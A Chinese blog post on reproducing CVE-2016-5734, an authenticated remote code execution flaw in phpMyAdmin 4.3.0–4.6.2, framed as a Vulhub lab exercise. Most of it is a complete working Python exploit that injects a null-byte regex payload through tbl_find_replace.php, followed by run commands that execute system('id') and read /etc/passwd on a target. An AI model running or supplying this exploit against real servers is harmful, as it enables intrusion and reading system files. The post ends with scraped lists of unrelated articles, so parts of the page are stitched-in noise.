简介

环境复现:https://github.com/vulhub/vulhub

线上平台:榆林学院内可使用协会内部的网络安全实验平台

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。

影响版本

phpmyadmin4.3.0-4.6.2

代码审计

待更新....

漏洞利用

漏洞利用py

#!/usr/bin/env python

"""cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2 authorized user RCE exploit

Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7.

CVE: CVE-2016-5734

Author: https://twitter.com/iamsecurity

run: ./cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');"

"""

import requests

import argparse

import sys

__author__ = "@iamsecurity"

if __name__ == '__main__':

    parser = argparse.ArgumentParser()

    parser.add_argument("url", type=str, help="URL with path to PMA")

    parser.add_argument("-c", "--cmd", type=str, help="PHP command(s) to eval()")

    parser.add_argument("-u", "--user", required=True, type=str, help="Valid PMA user")

    parser.add_argument("-p", "--pwd", required=True, type=str, help="Password for valid PMA user")

    parser.add_argument("-d", "--dbs", type=str, help="Existing database at a server")

    parser.add_argument("-T", "--table", type=str, help="Custom table name for exploit.")

    arguments = parser.parse_args()

    url_to_pma = arguments.url

    uname = arguments.user

    upass = arguments.pwd

    if arguments.dbs:

        db = arguments.dbs

    else:

        db = "test"

    token = False

    custom_table = False

    if arguments.table:

        custom_table = True

        table = arguments.table

    else:

        table = "prgpwn"

    if arguments.cmd:

        payload = arguments.cmd

    else:

        payload = "system('uname -a');"

    size = 32

    s = requests.Session()

    # you can manually add proxy support it's very simple ;)

    # s.proxies = {'http': "127.0.0.1:8080", 'https': "127.0.0.1:8080"}

    s.verify = False

    sql = '''CREATE TABLE `{0}` (

      `first` varchar(10) CHARACTER SET utf8 NOT NULL

    ) ENGINE=InnoDB DEFAULT CHARSET=latin1;

    INSERT INTO `{0}` (`first`) VALUES (UNHEX('302F6500'));

    '''.format(table)

    # get_token

    resp = s.post(url_to_pma + "/?lang=en", dict(

        pma_username=uname,

        pma_password=upass

    ))

    if resp.status_code is 200:

        token_place = resp.text.find("token=") + 6

        token = resp.text[token_place:token_place + 32]

    if token is False:

        print("Cannot get valid authorization token.")

        sys.exit(1)

    if custom_table is False:

        data = {

            "is_js_confirmed": "0",

            "db": db,

            "token": token,

            "pos": "0",

            "sql_query": sql,

            "sql_delimiter": ";",

            "show_query": "0",

            "fk_checks": "0",

            "SQL": "Go",

            "ajax_request": "true",

            "ajax_page_request": "true",

        }

        resp = s.post(url_to_pma + "/import.php", data, cookies=requests.utils.dict_from_cookiejar(s.cookies))

        if resp.status_code == 200:

            if "success" in resp.json():

                if resp.json()["success"] is False:

                    first = resp.json()["error"][resp.json()["error"].find("<code>")+6:]

                    error = first[:first.find("</code>")]

                    if "already exists" in error:

                        print(error)

                    else:

                        print("ERROR: " + error)

                        sys.exit(1)

    # build exploit

    exploit = {

        "db": db,

        "table": table,

        "token": token,

        "goto": "sql.php",

        "find": "0/e\0",

        "replaceWith": payload,

        "columnIndex": "0",

        "useRegex": "on",

        "submit": "Go",

        "ajax_request": "true"

    }

    resp = s.post(

        url_to_pma + "/tbl_find_replace.php", exploit, cookies=requests.utils.dict_from_cookiejar(s.cookies)

    )

    if resp.status_code == 200:

        result = resp.json()["message"][resp.json()["message"].find("</a>")+8:]

        if len(result):

            print("result: " + result)

            sys.exit(0)

        print(

            "Exploit failed!\n"

            "Try to manually set exploit parameters like --table, --database and --token.\n"

            "Remember that servers with PHP version greater than 5.4.6"

            " is not exploitable, because of warning about null byte in regexp"

        )

        sys.exit(1)
python PhpMyAdmin_RCE.py -u root -p "root" http://192.168.52.129:8080 -c "system('id')"
python PhpMyAdmin_RCE.py -u root -p "root" http://192.168.52.129:8080 -c "system('cat /etc/passwd')"

phpmyadmin远程代码执行漏洞(CVE-2016-5734)的更多相关文章

  1. Apache Struts 远程代码执行漏洞(CVE-2013-4316)

    漏洞版本: Apache Group Struts < 2.3.15.2 漏洞描述: BUGTRAQ ID: 62587 CVE(CAN) ID: CVE-2013-4316 Struts2 是 ...

  2. MongoDB ‘conn’Mongo 对象远程代码执行漏洞

    漏洞名称: MongoDB ‘conn’Mongo 对象远程代码执行漏洞 CNNVD编号: CNNVD-201307-497 发布时间: 2013-07-25 更新时间: 2013-07-25 危害等 ...

  3. Struts2再爆远程代码执行漏洞

    Struts又爆远程代码执行漏洞!在这次的漏洞中,攻击者可以通过操纵参数远程执行恶意代码.Struts 2.3.15.1之前的版本,参数action的值redirect以及redirectAction ...

  4. 【漏洞公告】CVE-2017-12615/CVE-2017-12616:Tomcat信息泄漏和远程代码执行漏洞

    2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,该漏洞受影响版本为7.0-7.80之间,在一定 ...

  5. 隐藏17年的Office远程代码执行漏洞(CVE-2017-11882)

    Preface 这几天关于Office的一个远程代码执行漏洞很流行,昨天也有朋友发了相关信息,于是想复现一下看看,复现过程也比较简单,主要是简单记录下. 利用脚本Github传送地址 ,后面的参考链接 ...

  6. phpcms2008远程代码执行漏洞

    phpcms2008远程代码执行漏洞 描述: 近日,互联网爆出PHPCMS2008代码注入漏洞(CVE-2018-19127).攻击者利用该漏洞,可在未授权的情况下实现对网站文件的写入.该漏洞危害程度 ...

  7. [转帖]Windows DHCPServer远程代码执行漏洞分析(CVE-2019-0626)

    Windows DHCPServer远程代码执行漏洞分析(CVE-2019-0626) ADLab2019-03-15共23605人围观 ,发现 4 个不明物体安全报告漏洞 https://www.f ...

  8. 【漏洞复现】Tomcat CVE-2017-12615 远程代码执行漏洞

    漏洞描述 [漏洞预警]Tomcat CVE-2017-12615远程代码执行漏洞/CVE-2017-12616信息泄漏 https://www.secfree.com/article-395.html ...

  9. Office CVE-2017-8570远程代码执行漏洞复现

    实验环境 操作机:Kali Linux IP:172.16.11.2 目标机:windows7 x64 IP:172.16.12.2 实验目的 掌握漏洞的利用方法 实验工具 Metaspliot:它是 ...

随机推荐

  1. 第三十六章 Linux常用性能检测的指令

    作为一个Linux运维人员,介绍下常用的性能检测指令! 一.uptime 命令返回的信息: 19:08:17              //系统当前时间 up 127 days,  3:00     ...

  2. 1.opengl绘制三角形

    顶点数组对象:Vertex Array Object,VAO,用于存储顶点状态配置信息,每当界面刷新时,则通过VAO进行绘制. 顶点缓冲对象:Vertex Buffer Object,VBO,通过VB ...

  3. Typora图片一键传——picgo使用兰空图床

    Typora picgo使用兰空图床 最近smms图床免费版的速度眼看着越来越慢,特别是到晚上,图片几乎是在原地打转,于是我想替换掉Typora中picgo默认使用的smms图床,网上的教程清一色地只 ...

  4. python的deque(双向)队列详解

    首先 python的队列有很多种 Python标准库中包含了四种队列,分别是queue.Queue / asyncio.Queue / multiprocessing.Queue / collecti ...

  5. Tensorflow--Debug

    1.解决tensorflow报错ValueError: Variable conv1/weights already exists, disallowed. 解决方法1:重开一个控制台 解决方法2:在 ...

  6. 使用AI技术获取图片文字与识别图像内容

    获取图片文字 如何使用python获取图片文字呢? 关注公众号[轻松学编程]了解更多- 1.通过python的第三方库pytesseract获取 通过pip install pytesseract导入 ...

  7. Python使用进程制作爬虫

    详情点我跳转 关注公众号"轻松学编程"了解更多. 1.进程 1.进程的概念 什么是进程->CPU在同一时刻只能处理一个任务,只是因为cpu执行速度很快. cpu在各个任务之间 ...

  8. 我的 Redis 被入侵了

    好吧,我也做了回标题党,像我这么细心的同学,怎么可能让服务器被入侵呢? 其实是这样的,昨天我和一个朋友聊天,他说他自己有一台云服务器运行了 Redis 数据库,有一天突然发现数据库里的数据全没了,只剩 ...

  9. (二)http请求方法和状态码

    1.HTTP请求方法 根据 HTTP 标准,HTTP 请求可以使用多种请求方法. HTTP1.0 定义了三种请求方法: GET.POST 和 HEAD方法. HTTP1.1 新增了六种请求方法:OPT ...

  10. 【Luogu】 P5482 [JLOI2011]不等式组 题解

    本来以为有多难,结果发现是道树状数组水题... 显然,对于每一个添加的不等式,有3种情况: \(a<0\) .此时可转换为 $x < {{a} \over {c-b}} $ . 但是,我们 ...